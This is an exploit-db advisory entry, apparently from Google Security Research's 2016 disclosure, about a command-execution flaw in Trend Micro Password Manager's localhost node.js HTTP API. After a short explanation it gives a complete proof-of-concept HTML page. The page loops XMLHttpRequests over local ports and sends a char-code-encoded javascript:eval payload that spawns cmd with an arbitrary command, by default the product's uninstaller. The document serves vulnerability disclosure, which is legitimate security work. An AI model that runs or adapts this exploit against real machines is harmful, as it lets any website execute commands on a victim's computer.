Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands

Reported by Google Security Research, 11 Jan 2016. Type: exploitdb. Source: www.exploit-db.com

Trend Micro Antivirus Vulnerability in node.js HTTP Server

Code
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=693

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest();
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {};

(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
-->

<html>
<head>
    <title>Trend Micro Maximum Security 10 Exploit</title>
</head>
<body>
    <p>
    Sample exploit for Trend Micro Maximum Security 10.
    <p>
    -- Tavis Ormandy.
    <p>
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <p>
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <p>
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
<script>
    function begin() {
        // The command you want to run, arguments will work but don't use single quotes.
        // Let's uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;

        // Start port; Trend Micro tries to open a port starting here until it works.
        var port = 49155;

        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])";

        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');

        // Create the XHRs
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();

            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);

            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
        }
    }
</script>
</body>
</html>


Vulners AI Score: 7.4 (High risk)